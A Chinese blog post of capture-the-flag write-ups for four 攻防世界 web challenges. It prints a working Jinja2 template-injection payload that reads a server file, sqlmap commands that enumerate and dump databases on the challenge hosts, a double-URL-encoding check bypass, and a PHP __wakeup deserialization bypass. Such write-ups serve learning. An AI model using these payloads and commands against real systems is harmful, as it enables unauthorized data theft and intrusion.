<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="书山有路勤为径，学海无涯苦作舟">





  <link rel="alternate" href="/atom.xml" title="A piece of cake" type="application/atom+xml">






<meta name="description" content="攻防世界 confusion1第一次接触这样的漏洞，认真学习了一波">
<meta property="og:type" content="article">
<meta property="og:title" content="攻防世界writeup">
<meta property="og:url" content="http://dvsx.github.io/2019/04/09/SSTI模板注入（攻防世界）/index.html">
<meta property="og:site_name" content="A piece of cake">
<meta property="og:description" content="攻防世界 confusion1第一次接触这样的漏洞，认真学习了一波">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://dvsx.github.io/2019/04/09/SSTI模板注入（攻防世界）/1.PNG">
<meta property="og:image" content="http://dvsx.github.io/2019/04/09/SSTI模板注入（攻防世界）/2.PNG">
<meta property="og:image" content="http://dvsx.github.io/2019/04/09/SSTI模板注入（攻防世界）/3.PNG">
<meta property="og:image" content="http://dvsx.github.io/2019/04/09/SSTI模板注入（攻防世界）/4.PNG">
<meta property="og:image" content="http://dvsx.github.io/2019/04/09/SSTI模板注入（攻防世界）/5.PNG">
<meta property="og:image" content="http://dvsx.github.io/2019/04/09/SSTI模板注入（攻防世界）/6.PNG">
<meta property="og:image" content="http://dvsx.github.io/2019/04/09/SSTI模板注入（攻防世界）/7.PNG">
<meta property="og:image" content="http://dvsx.github.io/2019/04/09/SSTI模板注入（攻防世界）/8.PNG">
<meta property="og:image" content="http://dvsx.github.io/2019/04/09/SSTI模板注入（攻防世界）/9.PNG">
<meta property="og:image" content="http://dvsx.github.io/2019/04/09/SSTI模板注入（攻防世界）/10.PNG">
<meta property="og:image" content="http://dvsx.github.io/2019/04/09/SSTI模板注入（攻防世界）/11.PNG">
<meta property="og:image" content="http://dvsx.github.io/2019/04/09/SSTI模板注入（攻防世界）/12.PNG">
<meta property="og:image" content="http://dvsx.github.io/2019/04/09/SSTI模板注入（攻防世界）/13.PNG">
<meta property="og:image" content="http://dvsx.github.io/2019/04/09/SSTI模板注入（攻防世界）/14.PNG">
<meta property="og:image" content="http://dvsx.github.io/2019/04/09/SSTI模板注入（攻防世界）/15.PNG">
<meta property="og:image" content="http://dvsx.github.io/2019/04/09/SSTI模板注入（攻防世界）/16.PNG">
<meta property="og:image" content="http://dvsx.github.io/2019/04/09/SSTI模板注入（攻防世界）/17.PNG">
<meta property="og:updated_time" content="2019-04-23T00:45:19.062Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="攻防世界writeup">
<meta name="twitter:description" content="攻防世界 confusion1第一次接触这样的漏洞，认真学习了一波">
<meta name="twitter:image" content="http://dvsx.github.io/2019/04/09/SSTI模板注入（攻防世界）/1.PNG">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://dvsx.github.io/2019/04/09/SSTI模板注入（攻防世界）/">





  <title>攻防世界writeup | A piece of cake</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
	
	<a href="https://github.com/Dvsx/dvsx.github.io"><img style="position: absolute; top: 0; right: 0; border: 0;" src="https://s3.amazonaws.com/github/ribbons/forkme_right_darkblue_121621.png" alt="Fork me on GitHub"></a>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">A piece of cake</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://dvsx.github.io/2019/04/09/SSTI模板注入（攻防世界）/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Dvsx">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/header.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="A piece of cake">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">攻防世界writeup</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-04-09T15:57:30+08:00">
                2019-04-09
              </time>
            

            

            
          </span>

          

          
            
          

          
          
             <span id="/2019/04/09/SSTI模板注入（攻防世界）/" class="leancloud_visitors" data-flag-title="攻防世界writeup">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">Visitors&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          


          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  1.3k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Reading time &asymp;</span>
                
                <span title="Reading time">
                  4
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="攻防世界-confusion1"><a href="#攻防世界-confusion1" class="headerlink" title="攻防世界 confusion1"></a>攻防世界 confusion1</h1><p>第一次接触这样的漏洞，认真学习了一波<br><a id="more"></a></p>
<h2 id="题目介绍"><a href="#题目介绍" class="headerlink" title="题目介绍"></a>题目介绍</h2><p>打开是一个网站，有登陆注册功能，正中间还有一张图片（后来才知道代表php vs python）<br><img src="/2019/04/09/SSTI模板注入（攻防世界）/1.PNG" alt=""><br>但是点击登陆注册都显示404，就很迷了，之后又去扫描了网站，并没有发现什么有用的东西<br><img src="/2019/04/09/SSTI模板注入（攻防世界）/2.PNG" alt=""><br>偶然间查看页面源代码，发现了端倪<br><img src="/2019/04/09/SSTI模板注入（攻防世界）/3.PNG" alt=""><br>这个404界面暗藏玄机啊！但还是不知道怎么做这道题</p>
<h2 id="查阅资料"><a href="#查阅资料" class="headerlink" title="查阅资料"></a>查阅资料</h2><p>其实就是查看wp…发现这道题目考察的是SSTI，好像发现了新大陆诶，然后一脸懵逼地查资料。<br>首先知道了这种题型的漏洞表现在哪，就是把我们的输入当作代码执行。<br><img src="/2019/04/09/SSTI模板注入（攻防世界）/4.PNG" alt=""><br>还可以导出所有的config变量，有些config变量可以暴露出重要的信息<br><img src="/2019/04/09/SSTI模板注入（攻防世界）/5.PNG" alt=""></p>
<h2 id="解决方法"><a href="#解决方法" class="headerlink" title="解决方法"></a>解决方法</h2><p>既然能够执行代码，就能够做很多事情，这里用到了沙箱逃逸（<a href="http://shaobaobaoer.cn/archives/656/python-sandbox-escape）" target="_blank" rel="noopener">http://shaobaobaoer.cn/archives/656/python-sandbox-escape）</a><br>沙箱逃逸,就是在给我们的一个代码执行环境下(Oj或使用socat生成的交互式终端),脱离种种过滤和限制,最终成功拿到shell权限的过程。其实就是闯过重重黑名单，最终拿到系统命令执行权限的过程。<br>这道题目过滤了一些关键字，用request.args绕过，所以构造payload<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&apos;&apos;[request.args.a][request.args.b][2][request.args.c]()[40](&apos;/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt&apos;)[request.args.d]()&#125;&#125;?a=__class__&amp;b=__mro__&amp;c=__subclasses__&amp;d=read</span><br></pre></td></tr></table></figure></p>
<h1 id="PHP2"><a href="#PHP2" class="headerlink" title="PHP2"></a>PHP2</h1><p>代码审计题目，题目刚进去是没有什么有用的信息，主要代码在/index.phps里面<br><img src="/2019/04/09/SSTI模板注入（攻防世界）/6.PNG" alt=""><br>第一个条件是传入的id不能是admin，两者之间是用“===”连接的，意思是不能利用php弱类型的方法传入admin，第二个条件是传入的id参数经url解码后的值不能为admin，那么解决方法就是将admin经过两次url加密，那用传入的参数经过浏览器的自动解码，结果是经过一次url加密的admin的值。<br>站长之家的不能编码，只能解码，所以用编码转换精灵来将admin编码两次然后传入就能得到flag了<br><img src="/2019/04/09/SSTI模板注入（攻防世界）/7.PNG" alt=""><br><img src="/2019/04/09/SSTI模板注入（攻防世界）/8.PNG" alt=""></p>
<h1 id="NewsCenter"><a href="#NewsCenter" class="headerlink" title="NewsCenter"></a>NewsCenter</h1><p>题目难度：一颗星<br>题目来源： XCTF 4th-QCTF-2018<br>考察内容：post类型注入<br>使用工具：sqlmap<br><img src="/2019/04/09/SSTI模板注入（攻防世界）/9.PNG" alt=""><br>因为之前遇到过这种类型的题目，所以一进去就知道是sql注入<br><img src="/2019/04/09/SSTI模板注入（攻防世界）/10.PNG" alt=""><br>因为对手工注入不太熟悉，所以干脆放弃手工直接用sqlmap（这是硬伤，有好多注入的题型用sqlmap是扫不出来的），这用sqlmap也不是好用的，因为之前只知道get类型的注入语句，所以就用get的方法尝试注入，但是一直报错，一度让我怀疑这道题考的是不是注入。后来看了wp才知道，原来是TMD POST类型的注入<br><img src="/2019/04/09/SSTI模板注入（攻防世界）/11.PNG" alt="这是报错的情况"><br>POST类型的注入和GET类型的诸如类似，只是多了一个参数，下面先来复习一下GET类型的注入吧(以当前题目的url为例)<br><strong>查看能不能注入：</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python2 sqlmap.py -u &quot;http://111.198.29.45:30407/?id=1&quot;</span><br></pre></td></tr></table></figure></p>
<p><strong>爆数据库：</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python2 sqlmap.py -u &quot;http://111.198.29.45:30407/?id=1&quot; --dbs</span><br></pre></td></tr></table></figure></p>
<p><strong>爆表名：</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python2 sqlmap.py -u &quot;http://111.198.29.45:30407/?id=1&quot; -D 数据库名 --tables</span><br></pre></td></tr></table></figure></p>
<p><strong>爆列名：</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python2 sqlmap.py -u &quot;http://111.198.29.45:30407/?id=1&quot; -D 数据库名 -T 表名 --cloumns</span><br></pre></td></tr></table></figure></p>
<p><strong>爆字段：</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python2 sqlmap.py -u &quot;http://111.198.29.45:30407/?id=1&quot; -D 数据库名 -T 表名 -C &quot;字段&quot; --dump</span><br></pre></td></tr></table></figure></p>
<p>接下来看看post类型的注入<br><strong>爆数据库：</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python2 sqlmap.py -u &quot;http://47.96.118.255:33066/&quot; --forms --dbs</span><br></pre></td></tr></table></figure></p>
<p>post类型的注入会有问题，默认y就可以<br><img src="/2019/04/09/SSTI模板注入（攻防世界）/12.PNG" alt=""><br><strong>爆表名：</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python2 sqlmap.py -u &quot;http://47.96.118.255:33066/&quot; --forms -D news --tables</span><br></pre></td></tr></table></figure></p>
<p><strong>爆字段：</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python2 sqlmap.py -u &quot;http://47.96.118.255:33066/&quot; --forms -D news -T secret_table --dump</span><br></pre></td></tr></table></figure></p>
<p>最后得到flag<br><img src="/2019/04/09/SSTI模板注入（攻防世界）/13.PNG" alt=""></p>
<h1 id="unserialize3"><a href="#unserialize3" class="headerlink" title="unserialize3"></a>unserialize3</h1><p>本题目考察的是php反序列化和<strong>__weakup()</strong>函数的绕过<br><img src="/2019/04/09/SSTI模板注入（攻防世界）/14.PNG" alt=""><br>和php序列化反序列化相联系的肯定就是魔术函数了，<strong>__weakup()</strong>函数是在反序列化的时候需要检查的函数，如果存在就跳过其他函数，直接执行<strong>__weakup()</strong>函数的内容。这道题目就是这样的，执行exit(‘bad requests’),而不执行echo flag.所以我们需要做的就是绕过<strong>__weakup()</strong>函数。<br><strong>绕过__weakup()函数的方法</strong><br>先来看一下字符串序列化后的结果<br><img src="/2019/04/09/SSTI模板注入（攻防世界）/15.PNG" alt=""><br><img src="/2019/04/09/SSTI模板注入（攻防世界）/16.PNG" alt=""><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">O:代表object（类），还有一种是A，代表数组</span><br><span class="line">4:代表对象名字占4个字符</span><br><span class="line">xctf：对象名</span><br><span class="line">1:对象有一个变量</span><br><span class="line">s:数据类型，s代表string，i代表int</span><br></pre></td></tr></table></figure></p>
<p>知道了这些，就可以绕过魔术函数了，方法就是让序列化的结果出错，就像例子中的，我们的类中本来就只有一个$flag变量，如果我们把变量名输入为2，就可以成功绕过了。<br>构造payload如下：<br><img src="/2019/04/09/SSTI模板注入（攻防世界）/17.PNG" alt=""><br>就可以成功得到flag了</p>

      
    </div>
    
    
    
	<div>
    
        <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>		
    
    </div>
    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>坚持原创技术分享，您的支持将鼓励我继续创作！</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>Donate</span>
  </button>
  <div id="QR" style="display: none;">

    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/images/alipay.png" alt="Dvsx Alipay">
        <p>Alipay</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/04/05/kali下钓鱼网站的制作/" rel="next" title="kali下钓鱼网站的制作">
                <i class="fa fa-chevron-left"></i> kali下钓鱼网站的制作
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/04/22/DDCTF-writeup/" rel="prev" title="DDCTF writeup">
                DDCTF writeup <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/header.jpg" alt="Dvsx">
            
              <p class="site-author-name" itemprop="name">Dvsx</p>
              <p class="site-description motion-element" itemprop="description">just do it!</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">13</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/Dvsx/dvsx.github.io" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:1414652185@qq.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://www.google.com" target="_blank" title="Google">
                      
                        <i class="fa fa-fw fa-google"></i>Google</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#攻防世界-confusion1"><span class="nav-number">1.</span> <span class="nav-text">攻防世界 confusion1</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#题目介绍"><span class="nav-number">1.1.</span> <span class="nav-text">题目介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#查阅资料"><span class="nav-number">1.2.</span> <span class="nav-text">查阅资料</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#解决方法"><span class="nav-number">1.3.</span> <span class="nav-text">解决方法</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#PHP2"><span class="nav-number">2.</span> <span class="nav-text">PHP2</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#NewsCenter"><span class="nav-number">3.</span> <span class="nav-text">NewsCenter</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#unserialize3"><span class="nav-number">4.</span> <span class="nav-text">unserialize3</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Dvsx</span>

  
</div>



  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>






<div class="theme-info">
    <div class="powered-by"></div>
    <span class="post-count">博客全站共10.2k字</span>
</div>


        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("xGNmiqSGt157oqMaxWDS6sWQ-gzGzoHsz", "jomcYALWE9BBRlbeMqJgFurR");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  

  

  

  
</body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/clicklove.js"></script>
